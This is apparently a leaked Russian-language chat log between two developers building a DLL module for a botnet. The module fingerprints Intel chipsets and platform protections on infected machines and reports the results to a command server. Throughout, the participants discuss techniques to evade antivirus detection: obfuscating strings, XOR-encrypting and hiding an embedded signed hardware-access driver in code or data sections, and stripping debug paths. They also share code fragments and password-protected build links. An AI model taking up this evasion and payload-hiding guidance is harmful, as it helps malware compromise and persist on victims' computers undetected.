Timestamp	From	To	Message
2020-07-17 09:14:02.010760	hof	naned	привет
2020-07-30 14:00:17.796697	naned	hof	Привет, мне Buza написал что у тебя есть шаблон модуля dll, api которого описан в module_HOWTO, можешь скинуть пожалуйста
2020-07-30 14:00:36.838420	hof	naned	привет
2020-07-30 14:00:50.743407	hof	naned	через мин 15-20 скину
2020-07-30 14:01:09.289462	naned	hof	ок, хорошо
2020-08-12 10:45:25.356778	naned	hof	Привет, слушай, возникла трабла с модулем небольшая
2020-08-12 10:47:07.345193	naned	hof	суть: гружу ее через LoadLibrary, в x86 все ок, перехожу на 64 разрядную версию - болт Error code - 126 (The module could not be found)
2020-08-12 10:47:23.226047	hof	naned	привет
2020-08-12 10:47:41.467227	naned	hof	не сталкивались с такими проблемами? я просто никогда либы не компилил
2020-08-12 10:47:48.002087	hof	naned	64 версию из 32 битной программы?
2020-08-12 10:47:53.770209	naned	hof	нет
2020-08-12 10:47:58.186670	naned	hof	64 из 64
2020-08-12 10:48:40.394057	hof	naned	странно конечно, думаю где то баг небольшой
2020-08-12 10:48:51.580775	hof	naned	может имя длл не то?
2020-08-12 10:49:22.201822	naned	hof	ну я просто меняю платформу сборки лоадера и самой либы
2020-08-12 10:49:39.199056	naned	hof	компилю и заменяю либу
2020-08-12 10:49:54.249666	naned	hof	имена 1в1 что в 32 что в 64 разрядной версии
2020-08-12 10:50:40.645368	hof	naned	проверь, чтобы длл находилась в той же папке, и что битности совпадают
2020-08-12 10:50:51.722119	hof	naned	должно работать
2020-08-12 10:51:04.574460	naned	hof	а лол
2020-08-12 10:51:27.662375	naned	hof	все да, я тупо сувал ее в 32 разрядную версию, а запускал через отладчик 64
2020-08-12 10:51:47.893696	naned	hof	это эпик, сорян что отвлек
2020-08-12 10:51:56.972282	hof	naned	бывает )
2020-08-19 07:23:03.607473	naned	hof	Привет, хотел узнать а buza когда вернется?
2020-08-19 07:42:30.436577	hof	naned	привет
2020-08-19 07:42:39.079166	hof	naned	буза будет в конце месяца
2020-08-19 07:43:08.540671	hof	naned	как успехи с модулем?
2020-08-19 07:48:11.152278	naned	hof	вроде ок, я его давно накидал, но у меня вопросы именно по функционалу
2020-08-19 07:48:40.518176	hof	naned	тз было?
2020-08-19 07:48:54.039609	naned	hof	ну по факту конкретного нет
2020-08-19 07:49:41.749940	hof	naned	задай, может что то подскажу
2020-08-19 07:50:10.968259	naned	hof	перед уходом мне буза дал задание сделать лайтовую версию той тулзы которую я писал, я ее сделал достаточно быстро, потом интегрировал ее в dll, но вопрос теперь по полновесной версии
2020-08-19 07:50:50.687503	naned	hof	вопрос в том, делать ли дня нее отдельную версию dll модуля или все пихать в 1
2020-08-19 07:51:18.517347	naned	hof	там изначально какая проблема в 2х словах
2020-08-19 07:51:52.304982	hof	naned	мне кажется делай отдельную
2020-08-19 07:52:42.084837	naned	hof	я написал тулзу которая через IO читает VID DID чипсета и дальше работает в зависимости от поколения, буза просил написать чекалку платформы без драйвера
2020-08-19 07:53:36.863980	hof	naned	и посылать информацию на сервер?
2020-08-19 07:55:06.145640	naned	hof	ну вообще да, логично что отдельная просто хотел уточнить
2020-08-19 07:55:19.132765	naned	hof	я вот не знаю ее на счет того что дальше делать с инфой
2020-08-19 07:56:06.977213	naned	hof	этого буза мне не сказал, я пока просто шлю ее в виде сообщений через lpEventCallback
2020-08-19 07:56:18.328515	hof	naned	пока этого достаточно
2020-08-19 07:56:29.974575	hof	naned	сообщения дойдут на командный сервер
2020-08-19 07:57:20.740681	hof	naned	так что смело занимайся полной версией модуля
2020-08-19 07:58:28.475862	naned	hof	а вот еще, соответственно обфусцировать строки andrivet при вызовах lpEventCallback не получится, их нужно чем-нибудь обфусцировать?
2020-08-19 07:59:56.319947	hof	naned	мы обфусцируем строки, чтобы антивирусам не так просто было поставить детекты
2020-08-19 08:00:19.193655	hof	naned	т.е. чтобы в теле dll или exe было как можно меньше статики
2020-08-19 08:00:57.892746	hof	naned	смысл, чтобы строка расшифровывалась (или формировалась) непосредственно перед использованием
2020-08-19 08:01:14.117927	naned	hof	да это я понимаю
2020-08-19 08:01:22.093583	hof	naned	потом тут же занулялась
2020-08-19 08:01:54.619676	hof	naned	а почему andrivet при вызовах lpEventCallback не получится?
2020-08-19 08:04:49.000016	naned	hof	уже не помню, сейчас посмотрю и тогда отпишу
2020-08-19 08:05:14.698306	hof	naned	ок
2020-08-19 08:05:24.858666	naned	hof	 помоему там только на стеке строки обфусцируются
2020-08-19 08:05:32.022425	naned	hof	но это не точно
2020-08-19 08:05:48.900537	hof	naned	ну так получил строку на стек, скопировал в любое место
2020-08-19 08:06:09.651771	hof	naned	отправил, занулил, освободил память
2020-08-19 08:07:31.521583	naned	hof	сейчас попробую, я помню у меня какие-то траблы с этим были, может опять какую-нибудь лайтовую ошибку допустил где
2020-08-19 08:30:55.745652	naned	hof	хм, все работает вообще без всяких бубнов
2020-08-19 08:31:18.608168	hof	naned	отлично
2020-08-19 08:31:41.985282	naned	hof	странно, похоже я опять где-то накосячил тогда(
2020-08-19 08:32:05.572024	hof	naned	от оптимизации компилятора многое зависит
2020-08-19 08:32:17.183465	hof	naned	нужно проверять всегда после изменения настроек
2020-08-19 08:32:18.654092	naned	hof	а
2020-08-19 08:32:35.657507	naned	hof	может быть да, я настраивал опции после этого
2020-08-19 08:33:04.612769	naned	hof	понял, спасибо за информацию!
2020-08-19 08:33:14.925808	hof	naned	не за что
2020-09-16 08:34:03.564658	naned	hof	Привет, я допилил свой модуль, буза сказал тебе его сбросить, вот сам релиз, также сейчас добавлю права в гит
2020-09-16 08:34:08.964863	naned	hof	Download: https://qaz.im/load/S36GNA/EQy6Ke
Delete: https://qaz.im/index.php?a=delete&q=514565449
2020-09-16 08:34:27.075253	naned	hof	sldMSTIAXd?o$F~bW1C5
2020-09-16 09:22:46.205780	hof	naned	привет, хорошо
2020-09-16 09:26:48.341973	hof	naned	в ресурсах драйвер?
2020-09-16 09:26:56.492030	naned	hof	да
2020-09-16 09:27:21.825262	hof	naned	зашифровать бы желательно
2020-09-16 09:27:24.491170	hof	naned	d:\src\rw\rwxe3\rw\driver\objfre_win7_x86\i386\RwDrv.pdb
2020-09-16 09:27:30.154677	naned	hof	окей
2020-09-16 09:27:44.744591	hof	naned	убрать debug info из драйвера
2020-09-16 09:27:48.889823	naned	hof	да, я думал над этим, забыл у буза узнать
2020-09-16 09:27:54.889822	naned	hof	он подписан
2020-09-16 09:28:04.168168	naned	hof	проще тогда зашифровать
2020-09-16 09:28:59.307675	hof	naned	и может не в ресурсы, а в секцию кода или данных его спрятать
2020-09-16 09:29:01.611713	naned	hof	драйвер не мой, это драйвер тулзы для работы с всякими регистрами , портами памятью и т.п.
2020-09-16 09:29:08.839065	hof	naned	я понимаю
2020-09-16 09:29:21.143537	hof	naned	\rwdrv.sys - зашифровать в .rdata
2020-09-16 09:29:27.582538	hof	naned	строку
2020-09-16 09:30:46.944882	naned	hof	да упустил что-то
2020-09-16 09:31:07.802299	hof	naned	проверь, просмотри в hex редакторе бинарники
2020-09-16 09:31:54.226502	naned	hof	да вроде проверил, в IDA смотрел, может не ту в релиз засунул, сейчас поправлю
так что на счет драйвера, куда его пихнуть и как?
2020-09-16 09:32:16.907549	naned	hof	есть какие-нибудь средства автоматизации таких вещей?
2020-09-16 09:32:50.780850	naned	hof	или просто самому положить руками?
2020-09-16 09:32:57.129974	hof	naned	самому придется сделать утилитку
2020-09-16 09:33:15.317544	naned	hof	ну и лучше зашифровать?
2020-09-16 09:33:34.640034	hof	naned	да, зашифруй
2020-09-16 09:34:10.387196	hof	naned	если в секцию данных, то может какое то простое шифрование типа xor, а потом допустим перевести в base64
2020-09-16 09:34:36.399297	hof	naned	если в секцию кода, то думаю xor будет достаточно
2020-09-16 09:35:00.113147	naned	hof	ну а критично с секцией данных
2020-09-16 09:35:05.333387	hof	naned	можешь и в ресурсы, но по моему так больше палят ав
2020-09-16 09:35:33.942006	hof	naned	делай как тебе проще
2020-09-16 09:35:44.666066	hof	naned	начнут палить, переделаешь
2020-09-16 09:35:50.651362	naned	hof	окей
2020-09-16 09:37:52.346941	hof	naned	по моему вот так раньше работало, в новых версия vs не проверял
2020-09-16 09:37:54.123081	hof	naned	
#pragma code_seg(push, ".text")
char const __declspec(allocate(".text")) _read64ptr[] = {
    0x48, 0x8b, 0x44, 0x24, 0x08,   /* mov rax, [rsp + 8] */
    0x8b, 0x00,                     /* mov eax. [rax] */
    0x8b, 0x50, 0x04,               /* mov edx, [rax + 4] */
    0xcb                            /* retf */
};
#pragma code_seg(pop)
2020-09-16 09:39:25.337249	naned	hof	сейчас попробую
2020-09-16 09:59:18.483219	naned	hof	да работает в таком виде:
#pragma code_seg(push, ".text")
__declspec(allocate(".text"))
const char _read64ptr[] =
{
	0x48, 0x8b, 0x44, 0x24, 0x08,   /* mov rax, [rsp + 8] */
	0x8b, 0x00,                     /* mov eax. [rax] */
	0x8b, 0x50, 0x04,               /* mov edx, [rax + 4] */
	0xcb                            /* retf */
};
#pragma code_seg(pop)
2020-09-16 09:59:51.911959	hof	naned	замечательно
2020-09-16 10:00:55.197877	naned	hof	сейчас тогда переделаю
2020-09-16 10:01:11.694856	hof	naned	окей
2020-09-16 10:49:31.432644	naned	hof	получилось, все ок работает, сейчас все проверю, подготовлю версии и скину
2020-09-16 10:49:51.287216	naned	hof	сделал обычный xor но в коде
2020-09-16 10:50:30.384460	hof	naned	ок
2020-09-16 10:54:30.243268	naned	hof	ничего страшного что этот код компоновщик засовывает с самое начало сегмента?
2020-09-16 10:58:12.361259	hof	naned	думаю пока ничего страшного, хотя можно добавить байт 500 какого то мусора
2020-09-16 10:58:54.747171	naned	hof	ок
2020-09-16 12:15:11.283364	naned	hof	Исправил
Download: https://qaz.im/load/byd3HG/zSNdrh
Delete: https://qaz.im/index.php?a=delete&q=117077848
2020-09-16 12:15:17.461777	naned	hof	eAGS~gx~ICEz5$95Y$ib
2020-09-16 14:05:35.714013	hof	naned	ок, принял
2020-09-16 19:18:46.051842	naned	hof	Блин я там фримем забыл сделать, в функции распаковки драйвера, чета подумал об этом, проверил, реально забыл, завтра сброшу поправленную версию
2020-09-16 19:19:21.457532	hof	naned	ок
2020-09-17 08:09:41.955828	naned	hof	Привет, вот поправленная версия
Download: https://qaz.im/load/nZY4KH/ektTA4
Delete: https://qaz.im/index.php?a=delete&q=1582727175
b~r9tRnaWG#|bxTOIZ#W
2020-09-17 08:09:53.146518	hof	naned	привет, ок
2020-09-17 08:11:21.735300	hof	naned	а информацию модуль через события отсылает?
2020-09-17 08:11:35.003596	naned	hof	да
2020-09-17 08:11:40.436102	hof	naned	ок
2020-09-17 08:11:42.182850	naned	hof	буза сказал пока так оставить
2020-09-17 08:11:49.987835	hof	naned	да, норм
2020-09-17 14:49:26.500512	hof	naned	а как ты передаешь сообщение? скинь плиз код в том месте, в котором передаешь ErrorInitPlatform
2020-09-17 15:33:23.357016	naned	hof		//Если платформа не интел выходим
	if (InitPlatform() != SUCCESS)
	{

		lpEventCallback(hModuleHandle, OBFUSCATED("ErrorInitPlatform"), OBFUSCATED("NoIntelPlatform"), NULL, 0, OBFUSCATED("Tag"), lpEventContext);
		goto Finish;
	}
2020-09-17 15:34:20.576704	hof	naned	а как платформу проверяешь?
2020-09-17 15:34:34.995588	naned	hof	а InitPlatform возвращает не SUCCESS только в случае 
	if (PlatformInfo.PCHPlatformInfo.vid != 0x8086)
		return ERROR_VID;
2020-09-17 15:34:53.316305	hof	naned	т.е. на x64 не работает?
2020-09-17 15:35:02.115690	naned	hof	нет не работает на amd
2020-09-17 15:35:42.399456	hof	naned	тогда модуль 64 бита не к чему?
2020-09-17 15:35:47.865660	naned	hof	они как-то спеки свои незахотели выкладывать в публичный доступ
2020-09-17 15:36:08.919229	naned	hof	нет работает только на Intell чипсетах
2020-09-17 15:36:16.631987	hof	naned	беда
2020-09-17 15:36:38.399002	naned	hof	а какой у тебя чипсет, может я конкретно для него найду
2020-09-17 15:37:31.357818	hof	naned	просто машин x86 совсем мало, основное кол-во как раз amd64
2020-09-17 15:39:39.603907	naned	hof	стоп
2020-09-17 15:39:54.407867	naned	hof	amd64 это разрядность, набор инструкций
2020-09-17 15:40:55.437539	naned	hof	просто так называется amd, хз наверное потому что может это на процах amd сначала появилось
2020-09-17 15:43:32.670116	hof	naned	так, а что тогда имеется ввиду под платформой?
2020-09-17 15:43:34.272905	naned	hof	а чипсет, это набор контроллеров в материнке, просто у Intell есть спеки на них, и я быстро разобрался что и куда писать, с amd процесс не пошел так легко и я бузе сказал что пока это только Intell чипсеты, он сказал ок, нужно вообще понять будет ли это работать и на каком числе машин
2020-09-17 15:43:53.326766	naned	hof	ну у меня аппаратная часть
2020-09-17 15:44:01.345623	hof	naned	т.е. битность не имеет значения?
2020-09-17 15:44:04.913608	naned	hof	нет
2020-09-17 15:44:20.798660	naned	hof	я же сделал 2 версии, х64 и х86
2020-09-17 15:44:34.689173	hof	naned	ок, понятно теперь
2020-09-17 15:45:15.478352	naned	hof	они обе работают, только 32 работает только в 32х разрядной системе, 64 соответственно только в 64, мне буза сказал сделать без гибкости
2020-09-17 15:45:40.152630	naned	hof	По факту тут	if (PlatformInfo.PCHPlatformInfo.vid != 0x8086)
		return ERROR_VID;
2020-09-17 15:45:55.036641	naned	hof	чичается вендор айди чипсета
2020-09-17 15:46:05.706369	naned	hof	он у интелл всегда x8086
2020-09-17 15:46:46.509582	hof	naned	ок
2020-09-17 15:46:46.518630	naned	hof	у тебя матенринка не Intell скорее всего
2020-09-17 15:46:56.917303	hof	naned	я на виртуалке проверял
2020-09-17 15:47:00.359226	naned	hof	а
2020-09-17 15:47:02.277022	naned	hof	смотри
2020-09-17 15:47:12.091236	naned	hof	это отдельная песня
2020-09-17 15:47:21.395727	naned	hof	Виртуалбокс?
2020-09-17 15:48:26.544745	hof	naned	да
2020-09-17 15:48:40.761839	naned	hof	на гитлабе есть заметка по поводу тестирования, так вот, в виртуалбоксе, да и вмваре есть эмуляция чипсета, но древнего (2006года чтоли у виртуал, у вмваре, так вообще 97 года)
2020-09-17 15:48:59.735849	naned	hof	в виртуалбоксе есть 2 чипсета, 1 амд другой интел
2020-09-17 15:49:09.159446	hof	naned	ясно
2020-09-17 15:49:22.303013	naned	hof	интел это ICH9
2020-09-17 15:49:59.152894	hof	naned	там при передаче данных небольшая ошибка, переделай плиз вот так

CHAR buf[1024];
lstrcpyA(buf,OBFUSCATED("NoIntelPlatform"));
lpEventCallback(hModuleHandle, OBFUSCATED("ErrorInitPlatform"), buf, NULL, 0, OBFUSCATED("Tag"), lpEventContext);
2020-09-17 15:50:15.552964	hof	naned	просто копируется из процесса 1024 байт
2020-09-17 15:50:52.524854	naned	hof	понял
2020-09-17 15:52:16.808992	naned	hof	я завтра тогда сброшу ок?
2020-09-17 15:52:41.926432	hof	naned	да, не срочно
2020-09-17 15:53:50.735191	naned	hof	я бузе уже писал, отлаживать именно полезную часть этой тулзы не очень получится на виртуалке
2020-09-17 15:54:31.049893	hof	naned	да, я понимаю теперь
2020-09-18 08:28:27.930092	naned	hof	Привет, я правильно понял, везде в lpEventCallback параметр pszEventInfo передавать 1024 байта?
2020-09-18 08:28:52.721661	naned	hof	указатель на стек с массивом 1024 байт
2020-09-18 08:34:14.105111	hof	naned	привет, да, не обязательно в стеке, но размер буфера 1024 байта
2020-09-18 08:34:30.498029	naned	hof	понял
2020-09-18 08:40:11.064015	naned	hof	а остальные параметры указатели LPCSTR не нужно расширять до 1024 байт?
2020-09-18 08:40:55.701772	naned	hof	там такой перечень параметров:
 typedef VOID (__stdcall *RemoteEventCallback)(PVOID hModuleHandle, LPCSTR pszEventName, LPCSTR pszEventInfo,
  PVOID pvOutData, DWORD dwOutDataSize, LPCSTR pszOutDataTag, PVOID pvContext);
2020-09-18 08:41:05.903214	hof	naned	можно и там расширить, но пока проблем не было
2020-09-18 08:41:17.163183	naned	hof	ок
2020-09-18 08:53:53.630844	naned	hof	Поправил
Download: https://qaz.im/load/rZBR3Z/irD3ff
Delete: https://qaz.im/index.php?a=delete&q=957833796

Ui}hvvT%Hbsv7p*ACNS~
2020-09-18 08:58:00.430510	hof	naned	ок, спс
2020-10-06 10:07:42.557589	naned	hof	Привет, я по поводу запуска модуля,  буза просил тебе напомнить про его запуск
2020-10-06 11:10:34.618724	hof	naned	привет, писал админу про запуск, напомню еще раз
2020-10-06 11:10:38.614114	hof	naned	сорри
2020-10-06 11:40:35.171732	naned	hof	окей
2020-10-09 09:15:07.168962	naned	hof	Привет, ну что есть новости по запуску или еще не запускали?
2020-10-09 09:15:45.641714	hof	naned	привет, сейчас уточню
2020-10-09 09:33:08.474577	hof	naned	сейчас прогрузит
2020-10-09 09:33:16.517082	naned	hof	окей
2020-10-09 09:33:22.331361	hof	naned	там у них проблемы были с беком
2020-10-09 09:33:31.113076	hof	naned	не смогли тогда прогрузить
2020-10-09 09:33:40.517813	naned	hof	понял
2020-10-09 09:33:47.070240	naned	hof	спасибо
2020-10-12 10:14:57.067302	naned	hof	Привет, ну что есть результаты какие-нибудь?
2020-10-12 10:16:30.199503	hof	naned	привет
2020-10-19 10:54:07.382935	naned	hof	Привет, слушай, а запуск со сбором "PlatformCheckResult" планируется?
2020-10-19 10:54:28.163636	hof	naned	привет
2020-10-19 10:54:39.853179	hof	naned	без него никак?
2020-10-19 10:55:21.326122	naned	hof	по факту вся инфа что собрана это просто список чипсетов, как на них реализована защита можно понять по PlatformCheckResult
2020-10-19 10:56:07.416154	hof	naned	ок, попробуем собрать
2020-10-19 10:56:54.838652	naned	hof	единственное, я чутка тоже потестил на своих машинах и чуть поменял подход, я тогда сейчас подготовлю новые  версии и сброшу  тебе
2020-10-19 10:57:53.822550	hof	naned	т.е. нужно запустить новую версию?
2020-10-19 10:58:02.770046	naned	hof	ну лучше ее
2020-10-19 10:58:14.747746	naned	hof	если это не слишком геморно
2020-10-19 10:59:10.970726	hof	naned	тогда давай вместо tag PlatformInfo сразу в таг пиши P0 или P1 или P3
2020-10-19 10:59:18.333984	naned	hof	ок
2020-10-19 10:59:27.735687	hof	naned	проще будет выборку делать
2020-10-19 11:00:56.747917	naned	hof	понял, так а на 10ке "InitError" ошибка еще вроде была?
2020-10-19 11:01:42.816143	hof	naned	я уже не помню
2020-10-19 11:29:29.941018	naned	hof	https://www.sendspace.com/file/0ysvqv
O@{Nmrl3yaQmThASz5%P
2020-10-19 11:29:41.990808	hof	naned	ок
2020-10-19 11:29:43.672878	naned	hof	готово
